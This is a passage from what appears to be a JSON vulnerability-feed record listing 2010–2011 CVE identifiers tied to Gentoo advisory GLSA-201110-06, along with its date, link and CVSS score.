"CVE-2010-1915", "CVE-2010-1917", "CVE-2010-2093", "CVE-2010-2094", "CVE-2010-2097", "CVE-2010-2100", "CVE-2010-2101", "CVE-2010-2190", "CVE-2010-2191", "CVE-2010-2225", "CVE-2010-2484", "CVE-2010-2531", "CVE-2010-2950", "CVE-2010-3062", "CVE-2010-3063", "CVE-2010-3064", "CVE-2010-3065", "CVE-2010-3436", "CVE-2010-3709", "CVE-2010-3710", "CVE-2010-3870", "CVE-2010-4150", "CVE-2010-4409", "CVE-2010-4645", "CVE-2010-4697", "CVE-2010-4698", "CVE-2010-4699", "CVE-2010-4700", "CVE-2011-0420", "CVE-2011-0421", "CVE-2011-0708", "CVE-2011-0752", "CVE-2011-0753", "CVE-2011-0755", 
"CVE-2011-1092", "CVE-2011-1148", "CVE-2011-1153", "CVE-2011-1464", "CVE-2011-1466", "CVE-2011-1467", "CVE-2011-1468", "CVE-2011-1469", "CVE-2011-1470", "CVE-2011-1471", "CVE-2011-1657", "CVE-2011-1938", "CVE-2011-2202", "CVE-2011-2483", "CVE-2011-3182", "CVE-2011-3189", "CVE-2011-3267", "CVE-2011-3268"], "modified": "2011-10-10T00:00:00", "id": "GLSA-201110-06", "href": "https://security.gentoo.org/glsa/201110-06", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}